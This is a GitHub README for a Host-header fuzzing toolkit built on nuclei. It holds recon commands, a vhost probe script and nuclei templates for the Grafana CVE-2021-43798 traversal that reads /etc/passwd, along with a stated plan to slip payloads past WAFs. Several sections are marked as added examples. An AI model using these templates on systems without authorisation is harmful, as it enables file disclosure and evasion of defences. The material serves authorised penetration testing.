
0xAwali / Virtual-Host

Licence: other
Modified Nuclei Templates Version to FUZZ Host Header


Requirements

1 - Understand Virtual Host

A virtual host lets one IP address serve more than one web site: the server picks the site from the Host header of each request (and, over TLS, from the SNI name in the handshake), so a site that no public DNS name points to can still be reached by sending the right Host value to the IP.

For example, nginx can serve two sites, dev.example.com and api.example.com, from the same address like this:

# The first server block on a port is nginx's default for that port unless another
# block says "default_server": a request whose Host matches no server_name is
# answered by it. This is why probing an IP with guessed Host values reveals
# sites that no public DNS name points to.
server {
        listen 80;
        listen [::]:80;

        root /var/www/dev/html;
        index index.html;

        server_name dev.example.com;   # selected by the Host header

        location / {
                try_files $uri $uri/ =404;
        }
}
server {
        listen 443 ssl;                # "ssl on;" is obsolete; the ssl parameter on listen replaces it
        listen [::]:443 ssl;

        ssl_certificate /path/your.crt;
        ssl_certificate_key /path/your.key;

        root /var/www/api/html;
        index index.html;

        server_name api.example.com;   # selected by the SNI name for the handshake and by the Host header for the request

        location / {
                try_files $uri $uri/ =404;
        }
}

2 - Install

dnsx

httpx

Nuclei

anew

3 - Clone this Repository

Virtual Host

Usage

# Resolve the subdomain list; -resp prints "name [ip]" pairs
cat subdomains.txt | dnsx -a -silent -retry 5 -resp -o scanning.txt
# Unique IPs, then keep the ones that answer HTTP(S)
cat scanning.txt | tr -d '[]' | awk '{ print $2 }' | sort -u | tee -a ips.txt
cat ips.txt | httpx -threads 200 -silent -retries 2 -timeout 10 -o aliveIPS.txt
# Unique resolvable names, then the ones that serve a web site under their own name
cat scanning.txt | awk '{ print $1 }' | sort -u | tee -a resolvableDomains.txt
cat resolvableDomains.txt | httpx -threads 200 -silent -retries 2 -timeout 10 -o websites.txt
cat websites.txt | sed 's|^https://||' | sed 's|^http://||' | tee aliveSUBDOMAINS.txt
# Names that resolve but serve nothing under their own name: the Host header wordlist
# (anew -d only prints the lines missing from aliveSUBDOMAINS.txt, it does not append)
cat resolvableDomains.txt | anew aliveSUBDOMAINS.txt -d | tee -a deadSUBDOMAINS.txt
# Point every template's payload file at that wordlist (use an absolute path)
sed -i 's|/home/mahmoud/Wordlist/AllSubdomains.txt|/path/deadSUBDOMAINS.txt|' *.yaml
# Run the templates against the live IPs; each request is repeated once per Host value
nuclei -c 300 -list aliveIPS.txt -bulk-size 50 -stats -retries 2 -timeout 20 -t "/Templates/CVE/" -severity high -o bugs.txt
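Before spending a full nuclei run on every name in deadSUBDOMAINS.txt, it helps to know which Host values an IP actually treats differently from an unknown name, because those are the virtual hosts worth fuzzing. The script below is an added example, not code from the Virtual-Host repository: it requests the same path from one IP with a random baseline Host and then with each candidate, and flags candidates whose status, redirect path or body size departs from the baseline. The IP, host names and response sizes in the sample table are constructed for the offline demo; `sample_fetch` stands in for the real `http_fetch`.

```python
"""Host-header (virtual host) probe with a baseline check.

Added example, not part of the 0xAwali/Virtual-Host repository. The idea:
a name that is not configured on the IP gets the default-server answer,
so anything that answers differently from a random Host is a real vhost.
"""
import http.client
import secrets
from dataclasses import dataclass
from typing import Callable, Dict, Iterable
from urllib.parse import urlsplit


@dataclass(frozen=True)
class Probe:
    status: int
    length: int          # response body length in bytes
    location: str = ""   # Location header, if any (redirect target)


def http_fetch(ip: str, host: str, port: int = 80, path: str = "/",
               timeout: float = 10.0) -> Probe:
    """Connect to the IP, but put the candidate name in the Host header."""
    conn = http.client.HTTPConnection(ip, port, timeout=timeout)
    try:
        conn.request("GET", path, headers={"Host": host, "User-Agent": "vhost-probe"})
        resp = conn.getresponse()
        body = resp.read()
        return Probe(resp.status, len(body), resp.getheader("Location") or "")
    finally:
        conn.close()


def _redirect_shape(location: str) -> str:
    """Keep only the path of a Location header, so a default http->https
    redirect that echoes the Host name back is not mistaken for a distinct site."""
    return urlsplit(location).path if location else ""


def differs(baseline: Probe, candidate: Probe, tolerance: int = 64) -> bool:
    """True when the server answered the candidate Host differently.

    The length tolerance absorbs pages that echo the Host name (in a <title>
    or an absolute link) without actually being another site.
    """
    if candidate.status != baseline.status:
        return True
    if _redirect_shape(candidate.location) != _redirect_shape(baseline.location):
        return True
    return abs(candidate.length - baseline.length) > tolerance


def find_vhosts(ip: str, hosts: Iterable[str],
                fetch: Callable[[str, str], Probe] = http_fetch,
                tolerance: int = 64) -> Dict[str, Probe]:
    """Return {host: probe} for every Host value the IP serves distinctly."""
    # An unguessable name under the reserved .invalid TLD yields the
    # default-server response that every candidate is compared against.
    baseline = fetch(ip, f"{secrets.token_hex(8)}.invalid")
    found: Dict[str, Probe] = {}
    for host in hosts:
        probe = fetch(ip, host)
        if differs(baseline, probe, tolerance):
            found[host] = probe
    return found


# Constructed sample: what one IP might answer for several Host values.
# 203.0.113.10 is a documentation address; the sizes are made up for the demo.
SAMPLE_IP = "203.0.113.10"
SAMPLE_HOSTS = ["dev.example.com", "api.example.com", "old.example.com"]
_DEFAULT = Probe(404, 1234)                 # the default-server page
_SAMPLE_RESPONSES = {
    "dev.example.com": Probe(200, 5120),    # a real site configured on the IP
    "api.example.com": Probe(302, 0, "https://api.example.com/login"),
    "old.example.com": Probe(404, 1240),    # default page that echoes the name
}


def sample_fetch(ip: str, host: str) -> Probe:
    """Offline stand-in for http_fetch that serves the constructed table."""
    return _SAMPLE_RESPONSES.get(host, _DEFAULT)


if __name__ == "__main__":
    # Offline demo; pass fetch=http_fetch to probe a live IP from aliveIPS.txt
    # with the names in deadSUBDOMAINS.txt.
    for host, probe in find_vhosts(SAMPLE_IP, SAMPLE_HOSTS, fetch=sample_fetch).items():
        print(f"{host:24} {probe.status} {probe.length} {probe.location}")
```

`http_fetch` speaks plain HTTP on port 80; for a port 443 target the candidate name has to go into the TLS SNI as well as the Host header (an `ssl.SSLContext` with `server_hostname` set to the candidate), otherwise the server picks the certificate and block for the default name and the comparison says nothing about the vhost.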

Keep in Your Mind

If you are going to use the SSRF templates, you must pass your own domain, one whose DNS and HTTP logs you can watch for the callback, e.g.

nuclei -c 300 -list aliveIPS.txt -bulk-size 50 -stats -retries 2 -timeout 20 -t "/Templates/SSRF/*.yaml" -var "MY-DOMAIN=me.com"

To minimize the number of errors, prefer a loop that runs nuclei against one IP at a time, e.g.

# read the file line by line instead of word-splitting `cat`, and quote the variable
while read -r ip; do
  nuclei -u "$ip" -bulk-size 50 -stats -retries 2 -timeout 20 -t "/Templates/" -severity high -o bugs.txt
done < aliveIPS.txt

Tips

If you are a nuclei-templates contributor, write your templates in HTTP raw request format; with the Host header as an explicit line in the request, this repository can swap it for a wordlist payload and stay up to date, e.g.

id:

info:
  name:
  author:
  severity:

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
        
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 

      - type: word
        words:
          - ""
          - ""
        condition: and

      - type: word
        part: header
        words:
          - ""

Planning

I'm trying to modify nuclei's templates to become more powerful, e.g. CVE-2021-43798:

id: CVE-2021-43798

info:
  name:
  author:
  severity:


requests:
  - method: GET
    path:
      - "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200

I'm going to replace ../../../../../../../../../../../../../../../../../../../etc/passwd with {{FILE-unix}}:

id: CVE-2021-43798

info:
  name: 
  author: 
  severity:


requests:
  - method: GET
    path:
      - "{{BaseURL}}/public/plugins/alertlist/{{FILE-unix}}"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200

That will help bypass WAFs by using custom payloads, because I think all WAFs detect ../../etc/passwd, so using ../../etc/passwd is going to be useless, but using custom payloads is going to be useful.
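Putting the Tips and Planning sections together: the page's own CVE-2021-43798 check rewritten as a raw request, with the Host line turned into a payload read from the wordlist that the Usage steps produce. This is an added example, not a template from this repository or from nuclei-templates: the id, name and author are illustrative, `vhost` is a payload name chosen here, and /path/deadSUBDOMAINS.txt is a placeholder for the absolute path of the wordlist. The traversal path and the matchers are the ones shown above; the `{{FILE-unix}}` variable from the plan is left out so the template runs without extra `-var` input.

```yaml
# Added example (not a template from the repository or from nuclei-templates).
# Same check as the page's CVE-2021-43798 template, but as a raw request so
# the Host header can be fuzzed from a wordlist. The wordlist path is a
# placeholder; "vhost" is our own payload name.
id: CVE-2021-43798-vhost

info:
  name: Grafana path traversal (CVE-2021-43798) across virtual hosts
  author: example
  severity: high

requests:
  - raw:
      - |
        GET /public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
        Host: {{vhost}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept: */*

    # One payload list: every line of the wordlist becomes one request to the
    # same target IP with a different Host header (batteringram = single list).
    payloads:
      vhost: /path/deadSUBDOMAINS.txt
    attack: batteringram
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200
```

Run it with `-list aliveIPS.txt` as in the Usage section: the connection goes to each IP, only the Host line changes per payload, and the first Host value that yields /etc/passwd stops the fuzz for that IP. Keep comments outside the `|` block, since anything inside it is sent as part of the request.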

Help Me!

These days I'm trying to find a junior web penetration testing position, but it must be remote because I'm still a student, so if you can help me, DM me on Twitter.
